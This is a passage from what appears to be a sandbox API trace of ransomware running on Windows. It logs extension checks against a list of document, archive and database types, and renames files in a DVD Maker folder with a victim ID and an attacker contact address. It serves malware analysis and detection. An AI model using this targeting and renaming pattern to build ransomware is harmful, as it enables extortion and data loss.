(lpString=".xls") returned 4 [0049.438] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.438] lstrlenW (lpString=".xlsx") returned 5 [0049.438] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1 [0049.438] lstrlenW (lpString=".ppt") returned 4 [0049.438] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.438] lstrlenW (lpString=".zip") returned 4 [0049.438] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.438] lstrlenW (lpString=".rar") returned 4 [0049.438] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.438] lstrlenW (lpString=".bz2") returned 4 [0049.438] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.439] lstrlenW (lpString=".7z") returned 3 [0049.439] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.439] lstrlenW (lpString=".dbf") returned 4 [0049.439] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.439] lstrlenW (lpString=".1cd") returned 4 [0049.439] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\FM20.CHM") returned 69 [0049.439] lstrlenW (lpString=".jpg") returned 4 [0049.439] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0050.721] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0050.721] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0050.721] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0050.721] lstrlenW (lpString=".doc") returned 4 [0050.721] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.721] lstrlenW (lpString=".docx") returned 5 [0050.721] lstrcmpiW (lpString1=".docx", lpString2="e.wmv") returned -1 [0050.721] lstrlenW (lpString=".pdf") returned 4 [0050.722] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.722] lstrlenW (lpString=".xls") returned 4 [0050.722] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.722] lstrlenW (lpString=".xlsx") returned 5 [0050.722] lstrcmpiW (lpString1=".xlsx", lpString2="e.wmv") returned -1 [0050.722] lstrlenW (lpString=".ppt") returned 4 [0050.722] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.722] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0050.722] lstrlenW (lpString=".zip") returned 4 [0050.722] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.722] lstrlenW (lpString=".rar") returned 4 [0050.722] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.722] lstrlenW (lpString=".bz2") returned 4 [0050.722] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.722] lstrlenW (lpString=".7z") returned 3 [0050.722] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.722] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0050.722] lstrlenW (lpString=".dbf") returned 4 [0050.722] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.722] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0050.722] lstrlenW (lpString=".1cd") returned 4 [0050.722] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.722] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 70 [0050.722] lstrlenW (lpString=".jpg") returned 4 [0050.722] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.722] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0050.723] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0050.723] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0050.723] lstrlenW (lpString=".doc") returned 4 [0050.723] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.723] lstrlenW (lpString=".docx") returned 5 [0050.723] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0050.723] lstrlenW (lpString=".pdf") returned 4 [0050.723] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.723] lstrlenW (lpString=".xls") returned 4 [0050.723] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.723] lstrlenW (lpString=".xlsx") returned 5 [0050.723] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0050.723] lstrlenW (lpString=".ppt") returned 4 [0050.723] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.723] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0050.723] lstrlenW (lpString=".zip") returned 4 [0050.723] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.723] lstrlenW (lpString=".rar") returned 4 [0050.723] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.723] lstrlenW (lpString=".bz2") returned 4 [0050.723] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.723] lstrlenW (lpString=".7z") returned 3 [0050.723] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.723] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0050.723] lstrlenW (lpString=".dbf") returned 4 [0050.723] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.723] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0050.723] lstrlenW (lpString=".1cd") returned 4 [0050.723] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.723] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74 [0050.723] lstrlenW (lpString=".jpg") returned 4 [0050.723] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.619] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0051.620] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.620] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.620] lstrlenW (lpString=".doc") returned 4 [0051.620] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.620] lstrlenW (lpString=".docx") returned 5 [0051.620] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0051.620] lstrlenW (lpString=".pdf") returned 4 [0051.620] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.620] lstrlenW (lpString=".xls") returned 4 [0051.620] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.620] lstrlenW (lpString=".xlsx") returned 5 [0051.620] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0051.620] lstrlenW (lpString=".ppt") returned 4 [0051.620] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.620] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.620] lstrlenW (lpString=".zip") returned 4 [0051.620] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.620] lstrlenW (lpString=".rar") returned 4 [0051.620] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.620] lstrlenW (lpString=".bz2") returned 4 [0051.620] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.620] lstrlenW (lpString=".7z") returned 3 [0051.620] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.620] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.620] lstrlenW (lpString=".dbf") returned 4 [0051.620] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.620] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.620] lstrlenW (lpString=".1cd") returned 4 [0051.620] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.620] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv") returned 75 [0051.620] lstrlenW (lpString=".jpg") returned 4 [0051.620] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.621] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0051.621] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.621] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.621] lstrlenW (lpString=".doc") returned 4 [0051.621] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.621] lstrlenW (lpString=".docx") returned 5 [0051.621] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0051.621] lstrlenW (lpString=".pdf") returned 4 [0051.621] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.621] lstrlenW (lpString=".xls") returned 4 [0051.621] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.621] lstrlenW (lpString=".xlsx") returned 5 [0051.621] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0051.621] lstrlenW (lpString=".ppt") returned 4 [0051.621] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.621] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.621] lstrlenW (lpString=".zip") returned 4 [0051.621] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.621] lstrlenW (lpString=".rar") returned 4 [0051.621] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.621] lstrlenW (lpString=".bz2") returned 4 [0051.621] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.621] lstrlenW (lpString=".7z") returned 3 [0051.621] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.621] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.622] lstrlenW (lpString=".dbf") returned 4 [0051.622] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.622] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.622] lstrlenW (lpString=".1cd") returned 4 [0051.622] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.622] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv") returned 79 [0051.622] lstrlenW (lpString=".jpg") returned 4 [0051.622] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.622] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0051.622] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.622] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.622] lstrlenW (lpString=".doc") returned 4 [0051.622] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.622] lstrlenW (lpString=".docx") returned 5 [0051.622] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0051.622] lstrlenW (lpString=".pdf") returned 4 [0051.622] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.622] lstrlenW (lpString=".xls") returned 4 [0051.622] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.622] lstrlenW (lpString=".xlsx") returned 5 [0051.622] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0051.622] lstrlenW (lpString=".ppt") returned 4 [0051.622] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.622] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.623] lstrlenW (lpString=".zip") returned 4 [0051.623] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.623] lstrlenW (lpString=".rar") returned 4 [0051.623] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.623] lstrlenW (lpString=".bz2") returned 4 [0051.623] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.623] lstrlenW (lpString=".7z") returned 3 [0051.623] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.623] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.623] lstrlenW (lpString=".dbf") returned 4 [0051.623] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.623] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.623] lstrlenW (lpString=".1cd") returned 4 [0051.623] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.623] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv") returned 82 [0051.623] lstrlenW (lpString=".jpg") returned 4 [0051.623] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.624] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0051.624] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.624] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.624] lstrlenW (lpString=".doc") returned 4 [0051.624] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.624] lstrlenW (lpString=".docx") returned 5 [0051.624] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0051.624] lstrlenW (lpString=".pdf") returned 4 [0051.624] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.624] lstrlenW (lpString=".xls") returned 4 [0051.624] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.624] lstrlenW (lpString=".xlsx") returned 5 [0051.624] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0051.624] lstrlenW (lpString=".ppt") returned 4 [0051.624] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.624] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.624] lstrlenW (lpString=".zip") returned 4 [0051.624] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.624] lstrlenW (lpString=".rar") returned 4 [0051.624] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.624] lstrlenW (lpString=".bz2") returned 4 [0051.624] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.625] lstrlenW (lpString=".7z") returned 3 [0051.625] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.625] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.625] lstrlenW (lpString=".dbf") returned 4 [0051.625] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.625] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.625] lstrlenW (lpString=".1cd") returned 4 [0051.625] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.625] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.625] lstrlenW (lpString=".jpg") returned 4 [0051.625] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.625] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0051.625] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.625] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.625] lstrlenW (lpString=".doc") returned 4 [0051.625] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.625] lstrlenW (lpString=".docx") returned 5 [0051.625] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0051.625] lstrlenW (lpString=".pdf") returned 4 [0051.625] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.625] lstrlenW (lpString=".xls") returned 4 [0051.625] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.625] lstrlenW (lpString=".xlsx") returned 5 [0051.625] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0051.626] lstrlenW (lpString=".ppt") returned 4 [0051.626] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.626] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.626] lstrlenW (lpString=".zip") returned 4 [0051.626] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.626] lstrlenW (lpString=".rar") returned 4 [0051.626] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.626] lstrlenW (lpString=".bz2") returned 4 [0051.626] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.626] lstrlenW (lpString=".7z") returned 3 [0051.626] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.626] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.626] lstrlenW (lpString=".dbf") returned 4 [0051.626] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.626] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.626] lstrlenW (lpString=".1cd") returned 4 [0051.626] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.626] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.626] lstrlenW (lpString=".jpg") returned 4 [0051.626] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.626] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0051.626] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.626] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.626] lstrlenW (lpString=".doc") returned 4 [0051.627] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.627] lstrlenW (lpString=".docx") returned 5 [0051.627] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0051.627] lstrlenW (lpString=".pdf") returned 4 [0051.627] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.627] lstrlenW (lpString=".xls") returned 4 [0051.627] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.627] lstrlenW (lpString=".xlsx") returned 5 [0051.627] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0051.627] lstrlenW (lpString=".ppt") returned 4 [0051.627] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.627] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.627] lstrlenW (lpString=".zip") returned 4 [0051.627] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.627] lstrlenW (lpString=".rar") returned 4 [0051.627] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.627] lstrlenW (lpString=".bz2") returned 4 [0051.627] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.627] lstrlenW (lpString=".7z") returned 3 [0051.627] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.627] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.627] lstrlenW (lpString=".dbf") returned 4 [0051.627] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.627] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.627] lstrlenW (lpString=".1cd") returned 4 [0051.627] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.627] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.627] lstrlenW (lpString=".jpg") returned 4 [0051.627] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.628] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0051.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.628] lstrlenW (lpString=".doc") returned 4 [0051.628] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.628] lstrlenW (lpString=".docx") returned 5 [0051.628] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0051.628] lstrlenW (lpString=".pdf") returned 4 [0051.628] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.628] lstrlenW (lpString=".xls") returned 4 [0051.628] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.628] lstrlenW (lpString=".xlsx") returned 5 [0051.628] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0051.628] lstrlenW (lpString=".ppt") returned 4 [0051.628] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.628] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.628] lstrlenW (lpString=".zip") returned 4 [0051.628] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.628] lstrlenW (lpString=".rar") returned 4 [0051.628] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.628] lstrlenW (lpString=".bz2") returned 4 [0051.628] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.628] lstrlenW (lpString=".7z") returned 3 [0051.628] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.628] lstrlenW (lpString="C:\\Program Files\\DVD 